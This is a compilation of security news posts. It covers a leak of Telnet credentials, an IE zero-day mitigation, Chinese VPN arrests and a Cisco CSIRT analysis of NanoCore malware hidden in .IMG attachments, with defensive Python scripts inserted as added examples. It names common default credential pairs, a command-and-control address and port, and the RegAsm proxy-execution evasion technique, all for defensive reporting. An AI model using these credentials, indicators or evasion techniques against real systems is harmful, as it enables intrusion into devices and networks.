3. In the example shown, “Citibank” has been detected as a fake banking app, installed on the device before Mobile Security was installed. Apps are recommended for you to remove or to trust.

4. Tap Uninstall to uninstall the fake app. A Details screen defines the security threats.

5. Tap Uninstall. A popup will ask if you want to uninstall the app.

6. Tap Uninstall once more to uninstall it. The app will uninstall.

7. If there are more potentially unwanted apps, tap the panel for Apps Removal Recommended to show the list of apps recommended for removal. The Removal Recommended list will show apps to Remove or Trust.

8. You can configure settings via Security Scan > Settings. This will allow you to choose the protection strength (Low, Normal, and High).

9. In Settings, check the Pre-Installation Scan, which is disabled by default, to block malware from Google Play before it’s installed. It sets up a virtual private network (VPN) and enables the real-time scan.

Among its other features, Trend Micro Mobile Security also:

  • Blocks dangerous websites from loading in any browsing app with Web Guard
  • Checks if public WiFi connections are safe with Wi-Fi Checker
  • Guards financial and commercial apps with Pay Guard Mobile
  • Optimizes your device’s performance with System Tuner and App Manager
  • Protects your kids’ devices with Parental Controls
  • Protects your privacy on social media with Social Network Privacy
  • Provides Lost Device Protection.

To find out more about Trend Micro Mobile Security, go to our Mobile Security Solutions website, where you can also learn about our Mobile Security solution for iOS.

Tags: Mobile Security, Mobile Antivirus, Mobile Antimalware, Android Antivirus

The post Defend Yourself Now and in the Future Against Mobile Malware appeared first on .

The Top 19 Information Security Conferences of 2020

With the 2010s now over, the infosec industry is fully invested in 2020 and beyond. The 2020s will no doubt present their fair share of challenging digital security threats. But they will also enable security professionals to discuss shared difficulties at conferences and summits. To help promote these collaborative events, we at The State […]

The post The Top 19 Information Security Conferences of 2020 appeared first on The State of Security.

Bot list with Telnet credentials for more than 500,000 servers and IoT devices leaked online

The availability online of a new collection of Telnet credentials for more than 500,000 servers, routers, and IoT devices made the headlines.

A hacker has published online a massive list of Telnet credentials for more than 515,000 servers and smart devices, including home routers. This is the biggest leak of Telnet passwords ever reported.

According to ZDNet, which first published the news, the list was leaked on a popular hacking forum by the operator of a DDoS booter service.

The list includes the IP address, username and password for the Telnet service for each device.

The list appears to be the result of an Internet scan for devices using default credentials or easy-to-guess passwords.

“As ZDNet understands, the list was published online by the maintainer of a DDoS-for-hire (DDoS booter) service.” reported ZDNet.

“When asked why he published such a massive list of “bots,” the leaker said he upgraded his DDoS service from working on top of IoT botnets to a new model that relies on renting high-output servers from cloud service providers.”

The lists leaked online are dated October-November 2019; let’s hope that Internet Service Providers will contact ZDNet to receive them, check whether the devices belong to their networks, and secure them.

In August 2017, security researcher Ankit Anubhav found a list of more than 1,700 valid Telnet credentials for IoT devices online.

The list of thousands of fully working Telnet credentials had been available on Pastebin since June 11, 2017.

Many IoT devices included in the list have default and well-known credentials (i.e., admin:admin, root:root, or no authentication required).

Top five credentials included in the list were:

  • root:[blank]—782
  • admin:admin—634
  • root:root—320
  • admin:default—21
  • default:[blank]—18

The popular researcher Victor Gevers, the founder of the GDI Foundation, analyzed the list and confirmed it was composed of more than 8,200 unique IP addresses, of which about 2,174 are accessible via Telnet with the leaked credentials.
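The two useful things an operator can do with such a list are the ones the article describes: check which listed addresses fall inside its own allocations so the owners can be notified, and tally which credential pairs dominate (the "root:[blank]" style counts above). The script below is an added example, not from the article, ZDNet or the researchers. It assumes a simple one-entry-per-line layout of `ip:port user:pass`; the sample lines use RFC 5737 documentation addresses and the CIDR blocks are constructed, so nothing here is a real device or a real leaked record.

```python
import ipaddress
from collections import Counter

# Constructed sample in the assumed "ip:port user:pass" layout; addresses are
# documentation ranges, and the malformed last line shows the parser skipping junk.
SAMPLE_LIST = """\
192.0.2.10:23 root:
192.0.2.11:23 admin:admin
198.51.100.7:23 root:root
198.51.100.8:23 admin:admin
203.0.113.5:23 root:
203.0.113.6:2323 default:
not-a-line
"""

# CIDR blocks a hypothetical operator is responsible for (constructed).
MY_RANGES = ["192.0.2.0/24", "203.0.113.0/25"]


def parse_entries(text: str):
    """Yield (ip, port, user, password) from lines shaped like 'ip:port user:pass'."""
    for line in text.splitlines():
        parts = line.split(maxsplit=1)
        if len(parts) != 2 or ":" not in parts[0] or ":" not in parts[1]:
            continue
        host, port = parts[0].rsplit(":", 1)
        if not port.isdigit():
            continue
        user, _, password = parts[1].partition(":")
        try:
            ip = ipaddress.ip_address(host)
        except ValueError:
            continue
        yield ip, int(port), user, password


def credential_frequencies(entries) -> Counter:
    """Count credential pairs; an empty password is rendered as [blank], as in the article."""
    return Counter(f"{user}:{password or '[blank]'}" for _ip, _port, user, password in entries)


def in_scope(entries, cidrs):
    """Return only the entries whose address lies inside the operator's own ranges."""
    nets = [ipaddress.ip_network(c) for c in cidrs]
    return [e for e in entries if any(e[0] in net for net in nets)]


def triage(text: str, cidrs) -> dict:
    """Summarise a list: total usable entries, the top credential pairs, and my affected IPs."""
    entries = list(parse_entries(text))
    return {
        "total": len(entries),
        "top_credentials": credential_frequencies(entries).most_common(3),
        "mine": sorted(str(e[0]) for e in in_scope(entries, cidrs)),
    }


if __name__ == "__main__":
    summary = triage(SAMPLE_LIST, MY_RANGES)
    print(f"{summary['total']} entries parsed")
    for pair, count in summary["top_credentials"]:
        print(f"  {pair:<20} {count}")
    print("addresses in my ranges:", ", ".join(summary["mine"]))
```

The "mine" list is what goes to the abuse or customer-notification queue; the frequency table is the argument for blocking default credentials at provisioning time rather than chasing individual devices afterwards.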

Pierluigi Paganini

(SecurityAffairs – Telnet credentials, hacking)

The post Bot list with Telnet credentials for more than 500,000 servers and IoT devices leaked online appeared first on Security Affairs.

Microsoft provides mitigation for actively exploited CVE-2020-0674 IE Zero-Day

Microsoft published a security advisory to warn of an Internet Explorer (IE) zero-day vulnerability (CVE-2020-0674) that is currently being exploited in the wild.

Microsoft has published a security advisory (ADV200001) that includes mitigations for a zero-day remote code execution (RCE) vulnerability, tracked as CVE-2020-0674, affecting Internet Explorer.

The tech giant confirmed that the CVE-2020-0674 zero-day vulnerability has been actively exploited in the wild.

“A remote code execution vulnerability exists in the way that the scripting engine handles objects in memory in Internet Explorer. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user.” reads the advisory published by Microsoft. “An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. If the current user is logged on with administrative user rights, an attacker who successfully exploited the vulnerability could take control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.”

An attacker could exploit the flaw to gain the same user permissions as the user logged into the compromised Windows device. If that user is logged on with administrative permissions, the attacker can take full control of the system.

The CVE-2020-0674 flaw could be triggered by tricking victims into visiting a website hosting specially crafted content designed to exploit the issue through Internet Explorer.

Microsoft announced that it is currently working on a patch to address the vulnerability; the company will likely release an out-of-band update because attackers are already exploiting the flaw in the wild.

Microsoft suggests restricting access to JScript.dll using the following workaround to mitigate this zero-day flaw.

For 32-bit systems, enter the following commands at an administrative command prompt:

    takeown /f %windir%\system32\jscript.dll
    cacls %windir%\system32\jscript.dll /E /P everyone:N

For 64-bit systems, enter the following commands at an administrative command prompt:

    takeown /f %windir%\syswow64\jscript.dll
    cacls %windir%\syswow64\jscript.dll /E /P everyone:N
    takeown /f %windir%\system32\jscript.dll
    cacls %windir%\system32\jscript.dll /E /P everyone:N

The company warns that implementing these mitigations might impact the functionality of components or features that use jscript.dll.

“Implementing these steps might result in reduced functionality for components or features that rely on jscript.dll. To be fully protected, Microsoft recommends the update be installed as soon as possible. Please revert the mitigation steps before installing the update to return to a full state.” continues the advisory.

To undo the workaround, use the following procedures.

For 32-bit systems, enter the following command at an administrative command prompt:

    cacls %windir%\system32\jscript.dll /E /R everyone

For 64-bit systems, enter the following commands at an administrative command prompt:

    cacls %windir%\system32\jscript.dll /E /R everyone
    cacls %windir%\syswow64\jscript.dll /E /R everyone

Pierluigi Paganini

(SecurityAffairs – CVE-2020-0674, hacking)

The post Microsoft provides mitigation for actively exploited CVE-2020-0674 IE Zero-Day appeared first on Security Affairs.

Chinese police arrested the operator of unauthorized VPN service that made $1.6 million from his activity

Chinese authorities continue operations against unauthorized VPN services that are very popular in the country.

China continues to intensify its monitoring of cyberspace and its prosecution of VPN services that could be used to bypass its censorship system, known as the Great Firewall.

The Great Firewall project has already blocked access to hundreds of the world’s 1,000 top websites, including Google, Facebook, Twitter, and Dropbox.

Since early 2019, the Chinese authorities have been banning “unauthorized” VPN services: any company offering such a service in the country must obtain an appropriate license from the government.

In December, the Chinese authorities sentenced a man to five-and-a-half years in prison for selling a VPN service without authorization.

According to an announcement from China’s Procuratorate Daily, the man was also fined 500,000 yuan ($76,000). Prosecutors said the man was convicted of collecting “illegal revenue” of 792,638 yuan ($120,500) from his unauthorized activity.

Now media report a new arrest made by Chinese authorities in the city of Taizhou: the police arrested a man known by the pseudonym Gao (29) who had operated a VPN service since mid-2016. Gao made more than 11 million Chinese yuan ($1.6 million) from renting access to VPN servers to more than 28,000 regular customers; he pleaded guilty in 2019 and is still awaiting the final sentence.

In December 2017, Chinese authorities sentenced a man from Dongguan to nine months in prison for operating a VPN service that earned him $2,000. Other criminal cases were reported by Chinese authorities in the following months; the blocked services had thousands of customers in the country.

In July 2019, in compliance with the Chinese Internet monitoring law, Apple started removing all iOS VPN apps from its App Store in China.

Pierluigi Paganini

(SecurityAffairs – Chinese authorities, privacy)

The post Chinese police arrested the operator of unauthorized VPN service that made $1.6 million from his activity appeared first on Security Affairs.

This Week in Security News: The First Patch Tuesday Update of 2020 and Pwn2Own Vancouver Announced

Welcome to our weekly roundup, where we share what you need to know about the cybersecurity news and events that happened over the past few days. This week, learn about a major crypto-spoofing bug impacting Windows 10 that has been fixed as part of Microsoft’s January Patch Tuesday update. Also, read about the launch of Pwn2Own Vancouver, where it will pay to hack a Tesla Model 3.

Read on:

Can You Hack a Tesla Model 3? $500,000 Says That You Can’t

Trend Micro’s Zero Day Initiative (ZDI) has officially announced that its Pwn2Own Vancouver competition will be hosted at CanSecWest March 18-20. This time, the stakes have been upped in the automotive category: the hacker who can evade the multiple layers of security found in a Tesla Model 3 to pull off a complete vehicle compromise will win a $500,000 prize and a new Tesla Model 3.

Texas School District Loses $2.3 Million to Phishing Scam, BEC

Manor Independent School District (MISD) in Texas is investigating an email phishing attack after a series of seemingly normal school-vendor transactions resulted in the loss of an estimated $2.3 million. According to the statement posted on Twitter, the district is cooperating with the Manor Police Department and the Federal Bureau of Investigation (FBI).

Equifax Settles Class-Action Breach Lawsuit for $380.5M

A Georgia court granted final approval for an Equifax settlement in a class-action lawsuit, after the credit-reporting agency was hit by its massive 2017 data breach. This week, the Atlanta federal judge reportedly ruled that Equifax will pay $380.5 million to settle lawsuits regarding the breach.

Sodinokibi Ransomware Increases Year-End Activity, Targets Airport and Other Businesses

The Sodinokibi ransomware, detected as Ransom.Win32.SODINOKIBI, was involved in several high-profile attacks in 2019. The ransomware ended the year by launching a new round of attacks aimed at multiple organizations, including the Albany International Airport and the foreign exchange company Travelex.

ICS Security in the Spotlight Due to Tensions with Iran

Given the heightened tensions between the U.S. and Iran, organizations with connected industrial infrastructure should be on guard. In the wake of the assassination, several cybersecurity experts and U.S. government officials have warned of the ICS security risk that Iran-affiliated adversaries pose. Others point to the likelihood of smaller cyberattacks designed to distract rather than prompt retaliation.

Dymalloy, Electrum, and Xenotime Hacking Groups Set Their Targets on US Energy Sector

At least three hacking groups have been identified aiming to interfere with power grids across the United States. The oil, gas, water and energy industries have proved to become a valuable target for threat actors looking to compromise ICS environments, and according to a report on the state of industrial control systems (ICSs), attempts in attacking the utilities industry are on the rise.

Microsoft Patches Major Crypto Spoofing Bug

A major crypto-spoofing bug impacting Windows 10 users has been fixed as part of Microsoft’s January Patch Tuesday security bulletin. The vulnerability could allow an attacker to spoof a code-signing certificate, vital to validating executable programs in Windows, and make it appear as if an application was from a trusted source.

Mobile Banking Trojan FakeToken Resurfaces, Sends Offensive Messages Overseas from Victims’ Accounts

Researchers recently discovered an updated version of the mobile banking trojan FakeToken after detecting 5,000 smartphones sending offensive text messages overseas. Once the malware infects an unprotected Android device, FakeToken is able to send and intercept text messages such as 2FA codes or tokens, as well as scan through the victim’s contacts to possibly send phishing messages.

Report: Chinese Hacking Group APT40 Hides Behind Network of Front Companies

An online group of cybersecurity analysts calling themselves “Intrusion Truth” doxed their fourth Chinese state-sponsored hacking operation. After previously exposing details about Beijing’s hand in APT3 (believed to operate out of the Guangdong province), APT10 (Tianjin province), and APT17 (Jinan province), Intrusion Truth has now begun publishing details about China’s cyber apparatus in the state of Hainan, an island in the South China Sea.

What are your thoughts on the major crypto-spoofing bug that was found by the NSA? Share your thoughts in the comments below or follow me on Twitter to continue the conversation: @JonLClay.

The post This Week in Security News: The First Patch Tuesday Update of 2020 and Pwn2Own Vancouver Announced appeared first on .

Get in the Security Fast Lane with a Stealthwatch and Encrypted Traffic Analytics Test Drive!

As businesses continue to move towards a more digital future, the threats they face continue to become more complex. As many organizations continue to embrace the benefits of cloud, IoT, and an increasingly mobile workforce, threat actors are taking advantage of these attack vectors to work their way into your business.

Cisco Stealthwatch provides comprehensive network-wide visibility and security analytics, so you can stay ahead of attackers and expose their locations and behaviors to help you prevent a security event from becoming a full-blown breach. Today, we’re happy to announce that you’ll have the chance to get behind the wheel and give Stealthwatch a live test drive!

Before they become customers, many organizations we work with have never experienced what it’s like to gain insight into their networks and how they might use the power of behavioral analytics and machine learning to detect threats. Fortunately, Stealthwatch test drives are the perfect way to gain first-hand experience with Stealthwatch and how you can use its capabilities to do just that.

The Cisco Stealthwatch Test Drive provides users with access to a fully configured environment with traffic that you generate, to test first-hand live use cases including:

  • Breach Detection
  • Insider and Advanced Threat Detection
  • High Risk Application Detection
  • Policy Violations
  • Encrypted Traffic Analytics

Attendees will get to experience life-like cyber security attack situations in a virtualized lab environment, playing the role of both attacker and defender. Operating in an environment similar to many large, complex networks, you will learn how an environment can become compromised, how security breaches are detected, and how to respond to these threats using Stealthwatch. Completing these labs will provide you with test plans to effectively operationalize Stealthwatch.

Whether you’re new to Stealthwatch and interested in trying the product for the first time, or a long-time customer, the Cisco Stealthwatch Test Drive Labs are a great way to see all of the detections and integrations that Stealthwatch can do for your organization and help you tailor your product experience to your network and security needs.

To see a schedule of upcoming Cisco Stealthwatch Test Drive Labs, be sure to visit: https://www.cisco.com/c/en/us/products/security/stealthwatch-test-drive.html

To learn more about Stealthwatch, please visit: https://www.cisco.com/go/stealthwatch

The post Get in the Security Fast Lane with a Stealthwatch and Encrypted Traffic Analytics Test Drive! appeared first on Cisco Blogs.

Disk Image Deception

Cisco’s Computer Security Incident Response Team (CSIRT) detected a large and ongoing malspam campaign leveraging the .IMG file extension to bypass automated malware analysis tools and infect machines with a variety of Remote Access Trojans. During our investigation, we observed multiple tactics, techniques, and procedures (TTPs) that defenders can monitor for in their environments. Our incident response and security monitoring team’s analysis on a suspicious phishing attack uncovered some helpful improvements in our detection capabilities and timing.

In this case, none of our intelligence sources had identified this particular campaign yet. Instead, we detected this attack with one of our more exploratory plays, looking for evidence of persistence in the Windows Autoruns data. This play successfully detected an attack against a handful of endpoints that used email as the initial access vector and had evaded our defenses at the time. Less than a week after the incident, we received alerts from our retrospective plays for this same campaign once our integrated threat intelligence sources delivered the indicators of compromise (IOC). This blog is a high-level write-up of how we adapted to a potentially successful attack campaign and of our tactical analysis to help prevent and detect future campaigns.

(This blog was co-authored by Jeff Bollinger & William Sheldon)

Incident Response Techniques and Strategy

The Cisco Computer Security and Incident Response Team (CSIRT) monitors Cisco for threats and attacks against our systems, networks, and data. The team provides around the globe threat detection, incident response, and security investigations. Staying relevant as an IR team means continuously developing and adapting the best ways to defend the network, data, and infrastructure. We’re constantly experimenting with how to improve the efficiency of our data-centric playbook approach in the hope it will free up more time for threat hunting and more in-depth analysis and investigations. Part of our approach has been that as we discover new methods for detecting risky activity, we try to codify those methods and techniques into our incident response monitoring playbook to keep an eye on any potential future attacks.

Although some malware campaigns can slip past the defenses with updated techniques, we preventatively block the well-known, or historical, indicators and leverage broad, exploratory analysis playbooks that focus more on how attackers operate and infiltrate. In other words, there is value in monitoring for the basic atomic indicators of compromise like IP addresses, domain names, file hashes, etc., but to go further you really have to look broadly at more generic attack techniques. These playbooks, or plays, help us find out about new attack campaigns that are possibly targeted and potentially more serious. While some might label this activity “threat hunting”, this data exploration process allows us to discover, track, and potentially share new indicators that get exposed during a deeper analysis.

Defense in depth demands that we utilize additional data sources in case attackers successfully evade one or more of our defenses, or if they were able to obscure their malicious activities enough to avoid detection. Recently we discovered a malicious spam campaign that almost succeeded due to a missed early detection. In one of our exploratory plays, we use daily diffs for all the Microsoft Windows registry autorun key changes since the last boot. Known as “Autoruns“, this data source ultimately helped us discover an ongoing attack that was attempting to deliver a remote access trojan (RAT). Along with the more mundane Windows event logs, we pieced together the attack from the moment it arrived and made some interesting discoveries on the way — most notably how the malware seemingly slipped past our front line filters. Not only did we uncover many technical details about the campaign, but we also used it as an opportunity to refine our incident response detection techniques and some of our monitoring processes.

IMG File Format Analysis

.IMG files are traditionally disk image files that store raw dumps of either a magnetic disk or an optical disc. Other disk image file formats include ISO and BIN. Previously, mounting disk image files on Windows required the user to install third-party software; however, Windows 8 and later automatically mount IMG files on open. Upon mounting, Windows File Explorer displays the data inside the .IMG file to the end user. Although disk image files are traditionally utilized for storing raw binary data, or bit-by-bit copies of a disk, any data could be stored inside them. Because of this functionality added to the Windows core operating system, attackers are abusing disk image formats to “smuggle” data past antivirus engines, network perimeter defenses, and other auto-mitigation security tooling. Attackers have also used the capability to obscure malicious second-stage files hidden within a filesystem by using ISO and, to a lesser extent, DMG. Perhaps the IMG extension also fools victims into considering the attachment an image instead of a binary Pandora’s box.
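Because the smuggling works by carrying a mountable filesystem inside an attachment, a mail-pipeline check should look at the content rather than trust the extension. The function below is an added example (not Cisco CSIRT's tooling): it recognises the on-disk signatures of ISO 9660 (`CD001` at byte 0x8001), FAT and NTFS boot sectors (jump opcode, `0x55AA` at byte 510, filesystem type strings), and then triages a constructed batch of attachments, flagging both image-extension files and files whose extension hides a filesystem. The attachment names and the minimal image bytes are built inline for the example and are not samples from the campaign.

```python
ISO_SIGNATURE_OFFSET = 0x8001   # "CD001" follows the volume-descriptor type byte at 0x8000
BOOT_SIGNATURE = b"\x55\xaa"    # last two bytes of a PC boot sector
IMAGE_EXTENSIONS = {".img", ".iso", ".bin", ".dmg", ".vhd"}


def classify_disk_image(data: bytes):
    """Return 'iso9660', 'fat' or 'ntfs' when data carries a filesystem signature, else None."""
    if (len(data) >= ISO_SIGNATURE_OFFSET + 5
            and data[ISO_SIGNATURE_OFFSET:ISO_SIGNATURE_OFFSET + 5] == b"CD001"):
        return "iso9660"
    if len(data) >= 512 and data[510:512] == BOOT_SIGNATURE and data[0] in (0xEB, 0xE9):
        if data[3:11] == b"NTFS    ":
            return "ntfs"
        if data[54:62].startswith(b"FAT") or data[82:90].startswith(b"FAT32"):
            return "fat"
        # No type string, but a sane bytes-per-sector value still points at a FAT BPB.
        if int.from_bytes(data[11:13], "little") in (512, 1024, 2048, 4096):
            return "fat"
    return None


def triage_attachments(attachments):
    """attachments: list of (filename, bytes).

    Flag anything that contains a mountable filesystem regardless of its extension,
    and anything with a disk-image extension whose content we could not recognise
    (worth a closer look rather than a pass).
    """
    findings = []
    for name, data in attachments:
        kind = classify_disk_image(data)
        ext = "." + name.rsplit(".", 1)[-1].lower() if "." in name else ""
        if kind:
            findings.append((name, kind, "disk image content"))
        elif ext in IMAGE_EXTENSIONS:
            findings.append((name, None, "image extension without recognised filesystem"))
    return findings


def build_iso_sample() -> bytes:
    """Constructed minimal ISO 9660 header: primary volume descriptor at sector 16."""
    buf = bytearray(0x8000 + 2048)
    buf[0x8000] = 1
    buf[0x8001:0x8006] = b"CD001"
    return bytes(buf)


def build_fat_sample() -> bytes:
    """Constructed FAT16 boot sector: jump, bytes-per-sector, type string, boot signature."""
    buf = bytearray(512)
    buf[0:3] = b"\xEB\x3C\x90"
    buf[11:13] = (512).to_bytes(2, "little")
    buf[54:62] = b"FAT16   "
    buf[510:512] = BOOT_SIGNATURE
    return bytes(buf)


# Constructed attachment batch: a FAT image with the lure-style name, an ISO hiding
# behind a .jpg extension, a harmless PDF and an .iso that is just zeros.
SAMPLE_ATTACHMENTS = [
    ("invoice_4471.img", build_fat_sample()),
    ("holiday.jpg", build_iso_sample()),
    ("report.pdf", b"%PDF-1.7 ... constructed stub ..."),
    ("blank.iso", b"\x00" * 4096),
]

if __name__ == "__main__":
    for name, kind, reason in triage_attachments(SAMPLE_ATTACHMENTS):
        print(f"{name:<20} {kind or '-':<8} {reason}")
```

Signature checks of this kind are cheap enough to run on every attachment before the sandbox sees it, and they catch the renamed-extension case that a filename filter alone misses.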

Know Where You’re Coming From

As phishing continues to grow in popularity as an attack vector, we have recently focused several of our email incident response plays on detecting malicious attachments and business email compromise techniques like header tampering or DNS typosquatting, and on preventative controls with inline malware prevention and malicious URL rewriting.

Any security tool that has even temporarily outdated definitions of threats or IOCs will be unable to detect a very recent event or an event with a recent, and therefore unknown, indicator. To ensure that these missed detections are not overlooked, we take a retrospective look back to see if any newly observed indicators are present in any previously delivered email. So when a malicious attachment is delivered to a mailbox, if the email scanners and sandboxes do not catch it the first time, our retrospective plays look back to see if the updated indicators are triggered. Over time sandboxes update their detection abilities and previously “clean” files could change status. The goal is to detect this changing status and if we have any exposure, then we reach out and remediate the host.

 

This process flow shows our method for detecting and responding to updated verdicts from sandbox scanners. During this process we collect logs throughout to ensure we can match against hashes or any other indicator or metadata we collect: 

Retrospective Email Detection Incident Response

Figure 1: Flow chart for Retrospective alerting
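The retrospective play described above, as an added worked example (this is not Cisco CSIRT's tooling). It assumes two feeds the post only describes in prose, a delivery log from the mail gateway and a stream of per-hash sandbox verdicts, and constructs both inline; a delivery counts as an exposure only when its attachment hash first became malicious after the mail had already been delivered, within the lookback window.

```python
"""Retrospective verdict check for already-delivered attachments.

Added example (not Cisco CSIRT's tooling). The delivery records and the
verdict stream below are constructed sample data, not real campaign data.
"""
from dataclasses import dataclass
from datetime import datetime, timedelta


@dataclass(frozen=True)
class Delivery:
    msg_id: str
    recipient: str
    attachment: str
    sha256: str
    delivered_at: datetime


@dataclass(frozen=True)
class Verdict:
    sha256: str
    verdict: str          # "clean" or "malicious"
    seen_at: datetime


T0 = datetime(2019, 6, 19, 9, 0)
H_IMG = "a" * 64          # constructed hash: clean at delivery, flipped two days later
H_OLD = "b" * 64          # constructed hash: known-bad long before delivery
H_OK = "c" * 64           # constructed hash: still clean

DELIVERIES = [
    Delivery("m1", "alice@example.org", "DHL_Label_Scan.img", H_IMG, T0 + timedelta(hours=1)),
    Delivery("m2", "bob@example.org", "DHL_Label_Scan.img", H_IMG, T0 - timedelta(days=40)),
    Delivery("m3", "carol@example.org", "invoice.iso", H_OLD, T0),
    Delivery("m4", "dave@example.org", "report.pdf", H_OK, T0),
]
VERDICTS = [
    Verdict(H_IMG, "clean", T0),
    Verdict(H_IMG, "malicious", T0 + timedelta(days=2)),
    Verdict(H_OLD, "malicious", T0 - timedelta(days=10)),
    Verdict(H_OK, "clean", T0),
]


def verdict_changes(verdicts, since):
    """Return {sha256: time} for hashes that first became malicious at or after
    `since`, i.e. indicators the inline scanners could not have known earlier."""
    first_bad = {}
    for v in sorted(verdicts, key=lambda v: v.seen_at):
        if v.verdict == "malicious" and v.sha256 not in first_bad:
            first_bad[v.sha256] = v.seen_at
    return {h: t for h, t in first_bad.items() if t >= since}


def exposures(deliveries, changes, lookback=timedelta(days=30)):
    """Deliveries whose attachment hash turned malicious only after the mail was
    already in the mailbox, within the retrospective window: these are the
    hosts to reach out to and remediate. A hash that was already bad before
    delivery is an inline-scanner miss, not a retrospective hit."""
    hits = []
    for d in deliveries:
        flipped_at = changes.get(d.sha256)
        if flipped_at is None:
            continue
        if d.delivered_at <= flipped_at <= d.delivered_at + lookback:
            hits.append((d.msg_id, d.recipient, d.attachment, flipped_at))
    return sorted(hits)


if __name__ == "__main__":
    for hit in exposures(DELIVERIES, verdict_changes(VERDICTS, since=T0)):
        print("remediate:", hit)
```

In a real deployment the verdict stream would be the sandbox's re-scan results or a periodic VirusTotal lookup of every delivered attachment hash, and the output feeds the host remediation step of the play.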

This process in combination with several other threat hunting style plays helped lead us to this particular campaign. The IMG file isn’t unique by any means but was rare and stood out to our analysts immediately when combined with the file name as a fake delivery invoice – one of the more tantalizing and effective types of phishing lures.

Incident Response and Analysis

We needed to pull apart as many of the malicious components as possible to understand how this campaign worked and how it had temporarily slipped past our defenses. The process tree below shows how the executable dropped by the original IMG attachment, once mounted, led to a Nanocore installation:

Analysis Behavior Graph

Figure 2: Visualization of the malicious process tree.

 

Autoruns

As part of our daily incident response playbook operations, we recently detected a suspicious Autoruns event on an endpoint. The log (Figure 3) indicated that an unsigned binary with multiple detections on the malware analysis site VirusTotal had established persistence through the HKCU 'Run' registry key: whenever the user logged in, the binary referenced in the run key would execute automatically. In this case the binary called itself "filename.exe" and had been dropped into the user's roaming profile directory, %APPDATA% (C:\Users\<user>\AppData\Roaming):

{
    "enabled": "enabled",
    "entry": "startupname",
    "entryLocation": "HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run",
    "file_size": "491008",
    "hostname": "[REDACTED]",
    "imagePath": "c:\\users\\[REDACTED]\\appdata\\roaming\\filename.exe",
    "launchString": "C:\\Users\\[REDACTED]\\AppData\\Roaming\\filename.exe",
    "md5": "667D890D3C84585E0DFE61FF02F5E83D",
    "peTime": "5/13/2019 12:48 PM",
    "sha256": "42CCA17BC868ADB03668AADA7CF54B128E44A596E910CFF8C13083269AE61FF1",
    "signer": "",
    "vt_link": "https://www.virustotal.com/file/42cca17bc868adb03668aada7cf54b128e44a596e910cff8c13083269ae61ff1/analysis/1561620694/",
    "vt_ratio": "46/73",
    "sourcetype": "autoruns"
}


Figure 3: Snippet of the event showing an unknown file attempting to persist on the victim host

Many of the anti-virus engines on VirusTotal detected the binary as the NanoCore Remote Access Trojan (RAT), a well-known malware kit sold on underground markets that gives complete control of the infected computer: recording keystrokes, enabling the webcam, stealing files and much more. Because this malware poses a serious risk, and because it had achieved persistence without being blocked by our endpoint security, we prioritized the alert and initiated an incident.

Once we had identified the infected host using one of our exploratory Autoruns plays, the immediate concern was containing the threat to limit potential loss. We downloaded a copy of the dropper from the infected host and performed additional analysis. First we wanted to confirm whether other online sandbox services agreed with the VirusTotal findings. Other services, including app.any.run, also detected Nanocore, based on a file called run.dat being written to the %APPDATA%\{GUID} folder, as shown in Figure 4:

app.any.run analysis

Figure 4: app.any.run analysis showing Nanocore infection

The sandbox report also alerted us to an unusual outbound network connection from RegAsm.exe to 185.101.94.172 over port 8166.

Now that we were confident this was not a false positive, we needed to find the root cause of the infection and determine whether other users were at risk from the same campaign. To begin answering this, we pulled the Windows Security Event Logs from the host using our asset management tool to understand what had occurred on the host at the time of the incident. A suspicious event recurring every second jumped out immediately: a file named "DHL_Label_Scan _ June 19 2019 at 2.21_06455210_PDF.exe" spawning the Windows Assembly Registration tool, RegAsm.exe.

Process Information:

 New Process ID:  0x4128

 New Process Name: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

 Token Elevation Type: %%1938

 Mandatory Label:  Mandatory Label\Medium Mandatory Level

 Creator Process ID: 0x2ba0

 Creator Process Name: \Device\CdRom0\DHL_Label_Scan _  June 19 2019 at 2.21_06455210_PDF.exe

 Process Command Line: "C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe"



 Figure 5: New process spawned from a ‘CdRom0’ device (the fake .img) calling the Windows Assembly Registration tool

This event stands out for several reasons.

  • The filename:
    1. Attempts to social engineer the user into thinking they are executing a PDF by appending “_PDF”
    2. “DHL_Label_Scan” Shipping services are commonly spoofed by adversaries in emails to spread malware.
  • The file path:
    1. \Device\CdRom0\ is the NT device path of the first CD-ROM device. Windows exposes a mounted .img or .iso as a virtual optical drive, so a file executed from the mounted image carries this device path in the event and a drive letter (D:) in its command line.
    2. A fake DHL label is a strange thing to have on a CD-ROM, and stranger still to insert into a work machine and execute.
  • The process relationship:
    1. Adversaries abuse the Assembly Registration tool “RegAsm.exe” for bypassing process whitelisting and anti-malware protection.
    2. MITRE ATT&CK tracked this common technique as T1121 (since reorganized as sub-technique T1218.009, System Binary Proxy Execution: Regsvcs/Regasm), noting that "Adversaries can use Regsvcs and Regasm to proxy execution of code through a trusted Windows utility. Both utilities may be used to bypass process whitelisting through use of attributes within the binary to specify code that should be run before registration or unregistration"
    3. We saw this technique in the app.any.run sandbox report.
  • The frequency of the event:
    1. The event was occurring every second, indicating some sort of command and control or heartbeat activity.

 

Mount Up and Drop Out

 

At this point in the investigation, we have now uncovered a previously unseen suspicious file: “DHL_Label_Scan _  June 19 2019 at 2.21_06455210_PDF.exe”, which is strangely located in the \Device\CdRom0\ directory, and the original “filename.exe” used to establish persistence.

The first event in this process chain shows explorer.exe spawning the malware from the D: drive, the letter Windows assigned to the mounted image:

Process Information:

 New Process ID:  0x2ba0

 New Process Name: \Device\CdRom0\DHL_Label_Scan _  June 19 2019 at 2.21_06455210_PDF.exe

 Token Elevation Type: %%1938

 Mandatory Label:  Mandatory Label\Medium Mandatory Level

 Creator Process ID: 0x28e8

 Creator Process Name: C:\Windows\explorer.exe

 Process Command Line: "D:\DHL_Label_Scan _  June 19 2019 at 2.21_06455210_PDF.exe"

Figure 6: Additional processes spawned by the fake PDF

 

The following event is the same one that originally caught our attention, which shows the malware spawning RegAsm.exe (eventually revealed to be Nanocore) to establish communication with the command and control server:

 

Process Information:

 New Process ID:  0x4128

 New Process Name: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

 Token Elevation Type: %%1938

 Mandatory Label:  Mandatory Label\Medium Mandatory Level

 Creator Process ID: 0x2ba0

 Creator Process Name: \Device\CdRom0\DHL_Label_Scan _  June 19 2019 at 2.21_06455210_PDF.exe

